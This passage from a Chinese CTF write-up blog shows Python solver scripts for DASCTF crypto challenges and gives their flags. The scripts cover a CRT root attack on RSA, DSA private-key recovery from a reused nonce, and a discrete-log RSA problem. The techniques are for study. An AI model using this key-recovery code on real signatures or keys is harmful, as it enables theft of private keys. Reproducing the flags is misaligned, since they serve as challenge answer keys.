    ms1=[10537190383977432819948602717449313819513015810464463348450662860435011008001132238851729268032889296600248226221086420035262540732157097949791756421026015741477785995033447663038515248071740991264311479066137102975721041822067496462240009190564238288281272874966280,121723653124334943327337351369224143389428692536182586690052931548156177466437320964701609590004825981378294358781446032392886186351422728173975231719924841105480990927174913175897972732532233,1440176324831562539183617425199117363244429114385437232965257039323873256269894716229817484088631407074328498896710966713912857642565350306252498754145253802734893404773499918668829576304890397994277568525506501428687843547083479356423917301477033624346211335450]

    cs1 =[2852589223779928796266540600421678790889067284911682578924216186052590393595645322161563386615512475256726384365091711034449682791268994623758937752874750918200961888997082477100811025721898720783666868623498246219677221106227660895519058631965055790709130207760704,21115849906180139656310664607458425637670520081983248258984166026222898753505008904136688820075720411004158264138659762101873588583686473388951744733936769732617279649797085152057880233721961,301899179092185964785847705166950181255677272294377823045011205035318463496682788289651177635341894308537787449148199583490117059526971759804426977947952721266880757177055335088777693134693713345640206540670123872210178680306100865355059146219281124303460105424]

    m1,mod1 = CRT(zip(cs1,ms1))   ms2=[168450500310972930707208583777353845862723614274337696968629340838437927919365973736431467737825931894403582133125917579196621697175572833671789075169621831768398654909584273636143519940165648838850012943578686057625415421266321405275952938776845012046586285747, 1921455776649552079281304558665818887261070948261008212148121820969448652705855804423423681848341600084863078530401518931263150887409200101780191600802601105030806253998955929263882382004, 25220695816897075916217095856631009012504127590059436393692101250418226097323331193222730091563032067314889286051745468263446649323295355350101318199942950223572194027189199046045156046295274639977052585768365501640340023356756783359924935106074017605019787]

    cs2 =[148052450029409767056623510365366602228778431569288407577131980435074529632715014971133452626021226944632282479312378667353792117133452069972334169386837227285924011187035671874758901028719505163887789382835770664218045743465222788859258272826217869877607314144, 1643631850318055151946938381389671039738824953272816402371095118047179758846703070931850238668262625444826564833452294807110544441537830199752050040697440948146092723713661125309994275256, 10949587016016795940445976198460149258144635366996455598605244743540728764635947061037779912661207322820180541114179612916018317600403816027703391110922112311910900034442340387304006761589708943814396303183085858356961537279163175384848010568152485779372842]

    print(m1)

    print(mod1)

    print(gmpy2.iroot(m1,7))

    m2, mod2 = CRT(zip(cs2, ms2))

    print(m2)

    print(mod2)

    print(gmpy2.iroot(m2, 7))


后面是DSA签名认证求私钥:先通过P*Q(p-1)//q解出p、q,然后用做差求k,再求x1、x2

脚本

import gmpy2

from Crypto.Util.number import *

from Crypto.PublicKey import DSA

from Crypto.Hash import SHA

from gmpy2 import invert,powmod

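import hashlib

# DSA domain parameters recovered in the previous step (p, q) and the
# intermediate t that step produced; t is kept for reference only.
p = 95139353880772104939870618145448234251031105153406565833029787299040378395002190438381537974853777890692924407167823818980082672873538133127131356810153012924025270883966172420658777903337576027105954119811495411149092960422055445121097259802686960288258399754185484307350305454788837702363971523085335074839

q = 895513916279543445314258868563331268261201605181

t = 60132176395922896902518845244051065417143507550519860211077965501783315971109433544482411208238485135554065241864956361676878220342500208011089383751225437417049893725546176799417188875972677293680033005399883113531193705353404892141811493415079755456185858889801456386910892239869732805273879281094613329645326287205736614546311143635580051444446576104548

tmp = p * q - (p + q)

n = p * q

print(tmp)


def int_to_bytes(n):
    """Minimal big-endian encoding of a non-negative int; 0 -> b'\\x00'.
    Stdlib stand-in for Crypto.Util.number.long_to_bytes."""
    return n.to_bytes(max(1, (n.bit_length() + 7) // 8), 'big')


def sha1_int(msg):
    """SHA-1 digest of *msg* as an int: the DSA message hash H(m)."""
    return int.from_bytes(hashlib.sha1(msg).digest(), 'big')


def modinv(a, m):
    """Multiplicative inverse of a modulo m (extended Euclid).
    Raises ValueError if gcd(a, m) != 1."""
    a %= m
    old_r, r = a, m
    old_s, s = 1, 0
    while r:
        quot = old_r // r
        old_r, r = r, old_r - quot * r
        old_s, s = s, old_s - quot * s
    if old_r != 1:
        raise ValueError("%d has no inverse modulo %d" % (a, m))
    return old_s % m


def recover_nonce(s1, s2, h1, h2, q):
    """Nonce k reused by two DSA signatures with s-values s1, s2 over
    message hashes h1, h2: k = (h1 - h2) / (s1 - s2) mod q.
    Raises ValueError if s1 == s2 (mod q)."""
    if (s1 - s2) % q == 0:
        raise ValueError("signatures share s; nonce cannot be recovered")
    return (h1 - h2) * modinv(s1 - s2, q) % q


def recover_private_key(s, k, h, r, q):
    """Private key x from one signature (r, s) with known nonce k:
    x = (s*k - h) / r mod q."""
    return (s * k - h) * modinv(r, q) % q


s1 = 376599166921876118994132185660203151983500670896

s2 = 187705159843973102963593151204361139335048329243

m1 = int_to_bytes(8382905590662478666595114136929713707132131361720892331048437274828529226704174)

m2 = int_to_bytes(10336852405630488944198347577475266693234960398137850045398990629116544863921454)

hm1 = sha1_int(m1)

hm2 = sha1_int(m2)

# Both signatures were produced with the same nonce, which is what makes
# the subtraction cancel x and expose k.
k = recover_nonce(s1, s2, hm1, hm2, q)

print(k)

r1 = 498841194617327650445431051685964174399227739376

r2 = 620827881415493136309071302986914844220776856282

s3 = 674735360250004315267988424435741132047607535029

# As in the original: both keys use hm1, i.e. the third signature (r2, s3)
# is treated as another signature over m1 with the same nonce.
x1 = recover_private_key(s1, k, hm1, r1, q)

x2 = recover_private_key(s3, k, hm1, r2, q)

print(int_to_bytes(x1))

print(int_to_bytes(x2))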

hardrsa

参考羊城杯2020 Power

img

from Crypto.Util.number import *

import sympy



e = 65537

# Group modulus handed to sympy.discrete_log as its first argument; its
# structure (why the discrete log is feasible) is not shown on this page.
y = 449703347709287328982446812318870158230369688625894307953604074502413258045265502496365998383562119915565080518077360839705004058211784369656486678307007348691991136610142919372779782779111507129101110674559235388392082113417306002050124215904803026894400155194275424834577942500150410440057660679460918645357376095613079720172148302097893734034788458122333816759162605888879531594217661921547293164281934920669935417080156833072528358511807757748554348615957977663784762124746554638152693469580761002437793837094101338408017407251986116589240523625340964025531357446706263871843489143068620501020284421781243879675292060268876353250854369189182926055204229002568224846436918153245720514450234433170717311083868591477186061896282790880850797471658321324127334704438430354844770131980049668516350774939625369909869906362174015628078258039638111064842324979997867746404806457329528690722757322373158670827203350590809390932986616805533168714686834174965211242863201076482127152571774960580915318022303418111346406295217571564155573765371519749325922145875128395909112254242027512400564855444101325427710643212690768272048881411988830011985059218048684311349415764441760364762942692722834850287985399559042457470942580456516395188637916303814055777357738894264037988945951468416861647204658893837753361851667573185920779272635885127149348845064478121843462789367112698673780005436144393573832498203659056909233757206537514290993810628872250841862059672570704733990716282248839

g = 2

# d mod (p-1): enough to decrypt c modulo p once p is known.
dp = 379476973158146550831004952747643994439940435656483772269013081580532539640189020020958796514224150837680366977747272291881285391919167077726836326564473

c = 57248258945927387673579467348106118747034381190703777861409527336272914559699490353325906672956273559867941402281438670652710909532261303394045079629146156340801932254839021574139943933451924062888426726353230757284582863993227592703323133265180414382062132580526658205716218046366247653881764658891315592607194355733209493239611216193118424602510964102026998674323685134796018596817393268106583737153516632969041693280725297929277751136040546830230533898514659714717213371619853137272515967067008805521051613107141555788516894223654851277785393355178114230929014037436770678131148140398384394716456450269539065009396311996040422853740049508500540281488171285233445744799680022307180452210793913614131646875949698079917313572873073033804639877699884489290120302696697425

# c1 = g**x (mod y) for the x that encodes p through the polynomial below.
c1 = 78100131461872285613426244322737502147219485108799130975202429638042859488136933783498210914335741940761656137516033926418975363734194661031678516857040723532055448695928820624094400481464950181126638456234669814982411270985650209245687765595483738876975572521276963149542659187680075917322308512163904423297381635532771690434016589132876171283596320435623376283425228536157726781524870348614983116408815088257609788517986810622505961538812889953185684256469540369809863103948326444090715161351198229163190130903661874631020304481842715086104243998808382859633753938512915886223513449238733721777977175430329717970940440862059204518224126792822912141479260791232312544748301412636222498841676742208390622353022668320809201312724936862167350709823581870722831329406359010293121019764160016316259432749291142448874259446854582307626758650151607770478334719317941727680935243820313144829826081955539778570565232935463201135110049861204432285060029237229518297291679114165265808862862827211193711159152992427133176177796045981572758903474465179346029811563765283254777813433339892058322013228964103304946743888213068397672540863260883314665492088793554775674610994639537263588276076992907735153702002001005383321442974097626786699895993544581572457476437853778794888945238622869401634353220344790419326516836146140706852577748364903349138246106379954647002557091131475669295997196484548199507335421499556985949139162639560622973283109342746186994609598854386966520638338999059



# sympy.discrete_log(n, a, b) returns x with b**x == a (mod n): the modulus
# is y, the target c1 and the base g. Presumably only feasible because the
# group order is smooth (Pohlig–Hellman); for a modulus this size a generic
# attack would not finish.
x=sympy.discrete_log(y,c1,g)

print(x)


# p is the root of 2019*a^2 + 2020*a^3 + 2021*a^4 = x. solve() returns all
# four roots; index [0] is assumed to be the rational one — check that the
# printed value is a positive integer before trusting the decryption.
a = sympy.Symbol('a')

p = sympy.solve(2019*a**2+2020*a**3+2021*a**4-x,a)[0]

print(p)

# RSA-CRT style partial decryption: c**dp mod p == m mod p, which is the
# whole message whenever m < p.
print(long_to_bytes(pow(c,dp,int(p))))

flag: DASCTF{98d923h4344e3bf72f8775xy65tvftv5}

密码人集合

在线数独求解器 (gwalker.cn),使用数字替换中文字符去求解就行

img

flag: DASCTF{4dbd22a894c9b668a5a40200ba879273}


文章作者: LANVNAL
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 LANVNAL !